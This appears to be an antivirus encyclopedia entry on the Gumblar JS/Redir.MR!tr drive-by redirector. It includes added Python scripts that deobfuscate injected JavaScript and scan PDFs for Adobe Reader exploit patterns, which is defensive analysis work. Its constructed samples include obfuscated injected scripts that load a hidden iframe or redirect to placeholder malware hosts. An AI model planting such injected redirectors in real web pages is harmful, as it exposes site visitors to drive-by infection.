JS/Redir.MR!tr - Released May 15, 2009 - Last Updated Jun 11, 2009
Aliases: Troj/JSRedir-R (Sophos)
Detection Availability
Visible Symptoms: Redirect to malicious websites.
Detailed Analysis: JS/Redir.MR!tr is part of a multi-stage drive-by download attack also known as Gumblar, Zlkon, or GENO. In the first stage, an obfuscated script is injected into compromised websites, so that the site serves it to every visitor as a cross-site scripting payload.
The obfuscation technique varies between infections, but the script mostly decodes to the same malicious URL.
The following domains are known to be used as second stage malware domains as of this writing:
The second stage occurs when a user visits an infected website. The injected script redirects the browser to a malicious site hosting further downloadable components such as PDF and SWF files. These files contain exploits that ultimately download a malicious Win32 executable.
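Triage of a suspected injection usually starts by statically decoding the injected script and recovering the URL it points at. The following Python script is an added example, not Fortinet's or the malware's code: it peels the simple encoders such redirectors rely on (String.fromCharCode, unescape with %XX and %uXXXX, \xNN escapes), then flags any script that was obfuscated and, once decoded, redirects the browser or writes an iframe pointing at an external URL. The embedded page is a constructed sample in that style, not the actual Gumblar injection, and the domains are placeholders.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page (NOT the real Gumblar injection): two injected scripts,
# one building an iframe from String.fromCharCode + unescape, the other setting
# window.location from a \xNN-escaped string. Domains are placeholders.
SAMPLE_HTML = r"""<html><body><p>Welcome</p>
<script>
var s=String.fromCharCode(104,116,116,112,58,47,47,109,97,108,119,97,114,101,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,103,111,46,112,104,112);
document.write(unescape('%3Ciframe%20src%3D%22')+s+unescape('%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));
</script>
<script>window.location="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x64\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x2f";</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[^\s'\"<>]*)?")
# What an injected redirector has to do once its payload is decoded.
REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)\.location\b|document\.write\s*\(|<iframe\b", re.I)


def _charcodes(m):
    return '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"'


def _unescape(m):
    # JavaScript unescape() understands %uXXXX as well as %XX.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda h: chr(int(h.group(1), 16)), m.group(2))
    return '"' + unquote(s) + '"'


def decode_layer(js):
    """Resolve one layer of the simple encoders used by injected redirectors."""
    js = FROMCHARCODE_RE.sub(_charcodes, js)
    js = UNESCAPE_RE.sub(_unescape, js)
    js = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return js


def deobfuscate(js, max_rounds=5):
    """Peel layers until the script stops changing (encoders are often nested)."""
    for _ in range(max_rounds):
        decoded = decode_layer(js)
        if decoded == js:
            break
        js = decoded
    return js


def analyze_page(html_text):
    """One finding per <script>: decoded URLs, redirect indicators and a verdict."""
    findings = []
    for n, m in enumerate(SCRIPT_RE.finditer(html_text), 1):
        raw = m.group(1)
        decoded = deobfuscate(raw)
        urls = sorted(set(URL_RE.findall(decoded)))
        indicators = sorted({i.lower() for i in REDIRECT_RE.findall(decoded)})
        findings.append({
            "script": n,
            "urls": urls,
            "indicators": indicators,
            # Flag only scripts that were obfuscated AND, once decoded, redirect
            # or write content pointing at an external URL.
            "suspicious": decoded != raw and bool(urls) and bool(indicators),
        })
    return findings


def redirect_domains(html_text):
    """Hostnames an obfuscated script on the page would send the browser to."""
    return {urlsplit(u).hostname
            for f in analyze_page(html_text) if f["suspicious"]
            for u in f["urls"]}


if __name__ == "__main__":
    for finding in analyze_page(SAMPLE_HTML):
        print(finding)
    print("redirect domains:", sorted(redirect_domains(SAMPLE_HTML)))
```

The decoding is purely static, so it handles the layered-but-stateless encoders that produce a fixed URL; scripts that assemble the URL with arithmetic, eval() or DOM lookups need a JavaScript emulator instead. Treat a recovered hostname as a lead to compare against known second-stage domains, not as a verdict on its own, and never fetch it from the analysis host.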
Notable exploits target the Collab.collectEmailInfo() (CVE-2007-5659) and util.printf() (CVE-2008-2992) JavaScript methods in Adobe Reader and Acrobat by passing overly long arguments to the affected functions.
Earlier versions of Foxit Reader were also affected by a util.printf() vulnerability of the same kind (CVE-2008-1104).
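The PDF components of the second stage can be triaged along the same lines. This Python heuristic is an added example, not the entry's own tooling: it pulls JavaScript out of a PDF, both from /JS literal strings and from FlateDecode streams, and flags any script that references util.printf() or Collab.collectEmailInfo() while also carrying an unusually long string literal, the "overly long argument" pattern described above. The two embedded documents are constructed in place and are not valid for a real viewer; the flagged one contains only padding, not a working exploit, and the 1000-byte threshold is an assumed tuning knob.

```python
import re
import zlib

# Method calls this entry names as exploit targets.
TARGET_METHODS = re.compile(rb"(util\.printf|Collab\.collectEmailInfo)\s*\(")
# JS string literals; the exploit feeds an oversized one to the method.
STRING_LITERAL = re.compile(rb'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'', re.S)
JS_LITERAL = re.compile(rb"/JS\s*\(")
# A dictionary directly followed by a stream (nested dictionaries are not handled).
STREAM_RE = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def _read_pdf_literal(buf, start):
    """Return the body of the PDF literal string whose '(' is at buf[start].

    Balanced parentheses may appear unescaped inside a PDF literal, so track
    nesting depth; backslash escapes are passed through for JS to interpret."""
    depth, i, out = 0, start, bytearray()
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\":
            out += buf[i:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
            out += c
        else:
            out += c
        i += 1
    return bytes(out)


def extract_js(pdf):
    """Return (source, script_bytes) pairs for /JS literals and stream bodies."""
    chunks = []
    for m in JS_LITERAL.finditer(pdf):
        chunks.append(("literal", _read_pdf_literal(pdf, m.end() - 1)))
    for m in STREAM_RE.finditer(pdf):
        dictionary, body = m.group(1), m.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # truncated or non-zlib data: nothing to scan
        chunks.append(("stream", body))
    return chunks


def scan_pdf(pdf, threshold=1000):
    """One finding per script; suspicious = target method plus oversized literal."""
    findings = []
    for source, js in extract_js(pdf):
        methods = sorted({m.group(1).decode() for m in TARGET_METHODS.finditer(js)})
        longest = max((len(m.group(1) or m.group(2) or b"")
                       for m in STRING_LITERAL.finditer(js)), default=0)
        findings.append({
            "source": source,
            "methods": methods,
            "longest_literal": longest,
            "suspicious": bool(methods) and longest > threshold,
        })
    return findings


# --- constructed test documents (minimal skeletons, not valid for a viewer) ---
def _obj(num, body):
    return b"%d 0 obj\n" % num + body + b"\nendobj\n"


def _flate_stream(num, data):
    z = zlib.compress(data)
    return _obj(num, b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(z)
                + z + b"\nendstream")


BENIGN_PDF = (b"%PDF-1.4\n"
              + _obj(1, b"<< /Type /Action /S /JavaScript /JS (app.alert('hello');) >>")
              + b"%%EOF\n")

# Padding only: the shape the heuristic keys on, not an exploit.
SUSPICIOUS_JS = b'var fmt = "' + b"A" * 5000 + b'";\nutil.printf(fmt, 1);'
SUSPICIOUS_PDF = (b"%PDF-1.4\n"
                  + _obj(1, b"<< /Type /Action /S /JavaScript /JS 2 0 R >>")
                  + _flate_stream(2, SUSPICIOUS_JS)
                  + b"%%EOF\n")

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(name, scan_pdf(doc))
```

The literal-length check is deliberately crude: a sample that builds its argument with String.fromCharCode(), unescape() or a doubling loop will not show a long literal and slips past it, which is why production scanners emulate the script rather than pattern-match it. Hex-encoded strings, object streams and filters other than FlateDecode are also out of scope here.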
Apply the vendor patches for the affected vulnerabilities.
Some reports indicate that this malware may also redirect Google search results.
Recommended Action
FortiGate Systems
- On the main screen of the FortiGate unit's web interface, check that the latest AV/NIDS database has been downloaded and installed; if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Patch
- Download and install the following patches: